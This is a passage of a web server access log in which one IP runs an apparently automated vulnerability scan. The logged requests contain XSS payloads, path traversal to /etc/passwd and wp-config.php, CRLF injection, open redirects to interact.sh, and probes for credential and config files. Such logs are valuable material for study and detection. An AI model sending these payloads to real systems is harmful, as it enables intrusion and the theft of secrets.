s-g%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:52 +0000] GET /?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:57 +0000] GET /servicedesk/customer/user/signup HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:16:30:59 +0000] POST /servicedesk/customer/user/signup HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:16:31:01 +0000] GET /secure/Signup!default.jspa HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:31:03 +0000] POST /secure/Signup.jspa HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:31:04 +0000] GET /session/login HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:31:21 +0000] GET /typo3/install.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:31:22 +0000] GET /fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:31:24 +0000] GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:31:26 +0000] GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:31:28 +0000] GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:31:31 +0000] GET /%0d%0aSet-Cookie:crlfinjection=1; HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:31:32 +0000] GET /auth/realms/master/clients-registrations/default/security-admin-console HTTP/1.1 404 1165
195.164.49.69 - - [20/Oct/2024:16:31:35 +0000] GET /xwiki/authenticate/wiki/xwiki%22onload=%22alert(document.domain)%22/resetpassword HTTP/1.1 404 1171
195.164.49.69 - - [20/Oct/2024:16:31:36 +0000] GET /.gitlab-ci.yml HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:31:38 +0000] GET /gitlab-ci.yml HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:31:40 +0000] GET /.gitlab-ci/variables.yml HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:31:42 +0000] GET /api?path=files&id=dfsse%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:16:31:44 +0000] GET /thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1105
- - - [20/Oct/2024:16:31:46 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:31:48 +0000] GET /azuredeploy.json HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:31:50 +0000] GET /?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:31:52 +0000] GET /api/api.php/%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1 404 1149
195.164.49.69 - - [20/Oct/2024:16:31:54 +0000] GET /config/default.json HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:31:56 +0000] GET /config.json HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:31:58 +0000] GET /config/config.json HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:32:00 +0000] GET /credentials/config.json HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:32:03 +0000] GET /db.xml HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:32:05 +0000] GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1 404 1154
- - - [20/Oct/2024:16:32:07 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:32:09 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:32:11 +0000] GET /wp-content/themes/eatery/nav.php?-Menu-=https://interact.sh/ HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:16:32:13 +0000] GET /wp-login.php?wp_lang=en_US%27 HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:32:15 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:32:17 +0000] GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:32:19 +0000] GET /auth/logout?continue=//interact.sh HTTP/1.1 404 1089
- - - [20/Oct/2024:16:32:21 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:32:23 +0000] GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:32:25 +0000] GET /wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1 HTTP/1.1 404 1101
83.212.98.101 - - [20/Oct/2024:16:32:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:16:32:27 +0000] GET /monitoring HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:32:29 +0000] GET /..%3B/monitoring HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:32:31 +0000] GET /cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:32:33 +0000] GET /wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26 HTTP/1.1 404 1160
195.164.49.69 - - [20/Oct/2024:16:32:35 +0000] GET /%5cgoogle.com/evil.html HTTP/1.1 400 1160
- - - [20/Oct/2024:16:32:36 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:32:40 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:32:40 +0000] GET /slurm/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:32:42 +0000] GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1 404 1135
195.164.49.69 - - [20/Oct/2024:16:32:44 +0000] GET /messages HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:32:46 +0000] GET /wp-content/plugins/elementor/readme.txt HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:16:32:48 +0000] GET /card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:32:50 +0000] GET /mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:32:52 +0000] GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/ HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:32:54 +0000] GET /v2/_catalog HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:32:56 +0000] GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1 404 1083
- - - [20/Oct/2024:16:32:58 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:33:01 +0000] GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:33:02 +0000] GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 404 1094
- - - [20/Oct/2024:16:33:04 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:33:06 +0000] GET /pools/default/buckets HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:33:08 +0000] GET /npm-debug.log HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:33:10 +0000] GET /assets/npm-debug.log HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:33:14 +0000] GET /%0A/interact.sh/ HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:33:16 +0000] GET /index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype HTTP/1.1 404 1083
- - - [20/Oct/2024:16:33:18 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:33:20 +0000] GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1 404 1168
195.164.49.69 - - [20/Oct/2024:16:33:23 +0000] GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1080
- - - [20/Oct/2024:16:33:24 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:33:25 +0000] POST /login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:33:28 +0000] GET /.appveyor.yml HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:33:30 +0000] GET /appveyor.yml HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:33:32 +0000] POST /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:33:34 +0000] GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:33:36 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:33:38 +0000] GET /index.php?redirect=http%3A%2F%2Fwww.interact.sh HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:33:39 +0000] GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:33:41 +0000] GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:33:43 +0000] GET /remote/loginredir?redir=javascript:alert(document.domain) HTTP/1.1 404 1095
- - - [20/Oct/2024:16:33:45 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:33:48 +0000] GET /SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1 HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:33:49 +0000] GET /docker-compose.yml HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:33:51 +0000] GET /docker-compose.prod.yml HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:33:53 +0000] GET /docker-compose.production.yml HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:33:55 +0000] GET /docker-compose.staging.yml HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:33:57 +0000] GET /docker-compose.dev.yml HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:33:59 +0000] GET /docker-compose-dev.yml HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:34:01 +0000] GET /docker-compose.override.yml HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:34:03 +0000] GET /settings HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:34:05 +0000] GET /sap/public/bc/icf/logoff?redirecturl=https://interact.sh HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:16:34:07 +0000] GET /?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:34:09 +0000] GET /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:16:34:11 +0000] GET /modules/babel/redirect.php?newurl=http://interact.sh HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:34:13 +0000] GET /picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:34:15 +0000] GET /debug/pprof/heap?debug=1 HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:34:17 +0000] GET /pprof/heap?debug=1 HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:34:19 +0000] GET /debug.seam HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:34:21 +0000] GET /explore/repos HTTP/1.1 404 1091
- - - [20/Oct/2024:16:34:24 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:34:27 +0000] GET /dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:16:34:27 +0000] GET //www.interact.sh HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:34:29 +0000] GET /access_tokens.db HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:34:31 +0000] GET /.config/gcloud/access_tokens.db HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:16:34:33 +0000] GET /phpmyadmin/index.php?db=information_schema HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:34:35 +0000] GET /phpMyAdmin/index.php?db=information_schema HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:34:37 +0000] GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 404 1136
- - - [20/Oct/2024:16:34:42 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:34:43 +0000] GET /search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1085
- - - [20/Oct/2024:16:34:45 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:34:48 +0000] GET /common/down/file?filekey=/../../../../../../../../../etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:34:50 +0000] GET /.hg/hgrc HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:34:51 +0000] GET /?aiowpsec_do_log_out=1&after_logout=https://interact.sh HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:34:53 +0000] GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:34:56 +0000] GET /loginLess/../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:16:34:58 +0000] GET /wp-json/wp/v2/asked-question HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:16:35:00 +0000] GET /storage/logs/laravel.log HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:35:02 +0000] GET /conf HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:16:35:04 +0000] GET /?wptouch_switch=desktop&redirect=http://interact.sh HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:35:06 +0000] GET /api/version HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:35:08 +0000] GET /api/v1/settings HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:35:10 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:35:15 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:35:17 +0000] GET /admin/folder.do HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:35:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:35:21 +0000] GET /logs/error.log HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:35:22 +0000] GET /php_errors.log HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:35:22 +0000] GET /MyErrors.log HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:35:22 +0000] GET /admin/error.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:35:22 +0000] GET /admin/errors.log HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:35:22 +0000] GET /admin/log/error.log HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:35:22 +0000] GET /admin/logs/error.log HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:35:23 +0000] GET /admin/logs/errors.log HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:35:23 +0000] GET /application/logs/application.log HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:16:35:23 +0000] GET /application/logs/default.log HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:35:23 +0000] GET /config/error_log HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:35:23 +0000] GET /error.log HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:35:23 +0000] GET /error.txt HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:35:23 +0000] GET /error/error.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:35:23 +0000] GET /error_log HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:35:24 +0000] GET /error_log.txt HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:35:24 +0000] GET /errors.log HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:35:24 +0000] GET /errors.txt HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:35:24 +0000] GET /errors/errors.log HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:35:24 +0000] GET /errors_log HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:35:24 +0000] GET /log.log HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:35:24 +0000] GET /log.txt HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:35:24 +0000] GET /log/error.log HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:35:25 +0000] GET /log/errors.log HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:35:25 +0000] GET /logs.txt HTTP/1.1 404 1082
83.212.98.101 - - [20/Oct/2024:16:35:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:16:36:11 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:36:11 +0000] GET /routes/error_log HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:36:12 +0000] GET /sdc.iopan.pl:80/error.log HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:36:12 +0000] GET /sdc.iopan.pl:80/errors.log HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:36:21 +0000] GET /logs/errors HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:36:22 +0000] GET /roundcube/logs/sendmail HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:36:23 +0000] GET /roundcube/logs/sendmail.log HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:36:23 +0000] GET /roundcube/logs/errors.log HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:36:23 +0000] GET /roundcube/logs/errors HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:36:23 +0000] GET /webmail/logs/sendmail HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:36:23 +0000] GET /webmail/logs/sendmail.log HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:36:23 +0000] GET /webmail/logs/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:36:23 +0000] GET /webmail/logs/errors HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:36:24 +0000] GET /mail/logs/sendmail HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:36:24 +0000] GET /mail/logs/sendmail.log HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:36:24 +0000] GET /mail/logs/errors.log HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:36:24 +0000] GET /mail/logs/errors HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:36:24 +0000] GET /logs/sendmail HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:36:24 +0000] GET /logs/sendmail.log HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:36:24 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:36:51 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:36:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:36:54 +0000] GET /arsys/shared/login.jsp HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:36:56 +0000] GET /rsso/admin/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:36:58 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:37:00 +0000] GET /webmin/ HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:37:02 +0000] GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:16:37:04 +0000] GET /workflow/jsp/logon.jsp HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:37:06 +0000] GET /user HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:16:37:08 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:37:10 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:37:12 +0000] GET /Authentication/Login HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:37:14 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:37:16 +0000] GET /sqlbuddy/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:37:18 +0000] GET /.idea/httpRequests/http-requests-log.http HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:16:37:20 +0000] GET /.idea/httpRequests/http-client.cookies HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:16:37:22 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:37:25 +0000] GET /dashboard HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:37:26 +0000] GET /_db/_system/_admin/aardvark/index.html HTTP/1.1 404 1128
83.212.98.101 - - [20/Oct/2024:16:37:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:16:37:28 +0000] GET /m/ HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:37:30 +0000] GET /webmail/login/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:37:32 +0000] GET /mobile/index.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:37:36 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:37:38 +0000] GET /nagvis/frontend/nagvis-js/index.php HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:16:37:38 +0000] GET /web/database/selector/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:37:40 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:37:42 +0000] GET /phppgadmin/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:37:44 +0000] GET /cgi-bin/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:37:46 +0000] GET /cgi-bin/html/login.html HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:37:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:37:50 +0000] GET /teampass HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:37:52 +0000] GET /_dashboards/app/login HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:37:54 +0000] GET /goanywhere/auth/Login.xhtml HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:37:56 +0000] GET /webclient/Login.xhtml HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:37:58 +0000] GET /Kenesto/Account/LogOn?ReturnUrl=%2fkenesto HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:38:00 +0000] GET /mailscanner/login.php HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:38:02 +0000] GET /signin HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:38:04 +0000] GET /stats?json HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:38:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:38:08 +0000] GET /cacti/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:38:10 +0000] GET /webclient/Login.xhtml HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:38:12 +0000] GET /sessions/new HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:38:14 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:38:16 +0000] GET /log/development.log HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:38:18 +0000] GET /logs/development.log HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:38:20 +0000] GET /development.log HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:38:22 +0000] GET /elmah HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:38:24 +0000] GET /elmah.axd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:38:26 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:38:28 +0000] GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:38:30 +0000] GET /app/welcome/default/ HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:38:32 +0000] GET /camunda/app/welcome/default/ HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:16:38:34 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:38:36 +0000] GET /host-manager/html HTTP/1.1 403 3022
195.164.49.69 - - [20/Oct/2024:16:38:38 +0000] GET /manager/status HTTP/1.1 401 2499
195.164.49.69 - - [20/Oct/2024:16:38:45 +0000] GET /webclient/ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:38:47 +0000] GET /global-protect/login.esp HTTP/1.1 404 1102
